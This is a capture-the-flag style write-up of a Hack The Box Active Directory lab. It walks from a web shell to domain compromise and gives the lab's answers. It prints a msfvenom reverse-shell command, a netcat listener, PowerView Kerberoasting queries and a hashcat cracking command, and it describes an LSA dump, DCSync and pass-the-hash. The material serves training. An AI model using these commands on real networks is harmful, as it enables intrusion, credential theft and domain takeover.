AD Enumeration & Attacks - Hack The Box - Skill Assessment 1

This is a write-up about the skills assessment lab AD Enumeration & Attacks module from Hack The box. 

Scenario

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.

As the content is long, I divided the same based on the questions that needs to be answered in the skill assessment.

Q1 - Submit the contents of the flag.txt file on the administrator Desktop of the web server

Accessing the Web-shell using the shared credentials, I confirmed the system access on the web-server, and managed to get the flag without any additional technique. 

webshell flag1

Q2 - Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

At this point the things were getting interesting, I decided to create and upload a reverse shell to the web server to better enumerate the host. This can be done as per the three steps below:

- generate the payload with msfvenon: msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK HOST> LPORT=4444 -f exe > Test1.exe

- start the netcat on the Attack host: nc -vlnp 4444

- Upload the payload file to the web-server and execute it.

After that, using the query below in a powershell terminal, I found the account svc_sql as the account name.

Get-DomainObject -LDAPFilter "(servicePrincipalName=MSSQLSvc/SQL01.inlanefreight.local:1433)" -Properties samaccountname

SPN - account svc_sql

Q3 - Crack the account's password. Submit the cleartext value.

As I had SYSTEM session, I uploaded the PowerView to perform the Kerberoasting attack and retrieve the TGS ticket from svc_sql.

Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat

kerberoating

After that, I moved the hash to a file and cracked the password offline, which revealed the password 'lucky7':

hashcat -m 13100 svc_sql_tgs /usr/share/wordlists/rockyou.txt

password cracking

Q4 - Submit the contents of the flag.txt file on the Administrator desktop on MS01

Using the svc_sql credential, I connected straight to MS01 and retrieved the flag.

flag 4

Q5 - Find cleartext credentials for another domain user. Submit the username as your answer.

To Answer this question and the following ones, I decided to use the webserver as a pivot host, so that I could perform some tests directly from the linux attack host.
I established the tunnelling using ligolo-ng, you may find more about this technique on my previous post.

Finally, I used CrackMapExec to dump the LSA data from the MS01 machine’s IP, which revealed the cleartext credentials for the user tpetty.

lsa dump MS01

Q6 - Submit this user's cleartext password

The answer is also in the image above; Sup3rS3cur3D0m@inU2eR

Q7 - What attack can this user perform?

To answer the question, I imported PowerView and performed ACL enumeration as per the module :

PS C:\> Import-Module .\PowerView.ps1

PS C:\> $sid = Convert-NameToSid tpetty

PS C:\> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 

The output revealed an access control entry (ACE) for DS-Replication-Get-Changes-All. As described in the module, we can achieve DCSync once such account is compromised.

tpetty ACE

Q8 - Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

To take over the DC01, first, I checked which users were part of 'Domain Admin' as per the following command:

domain admin users query

The output returned the user Administrator only.

After that, abusing of tpetty's credentials, I dumped the NT hashes from the DC01 machine

dcsync abuse

Finally, I connected to the DC01 using Administrator's hash through pass the hash technique.

DC01 compromise

Last but not least, the DC flag:

DC flag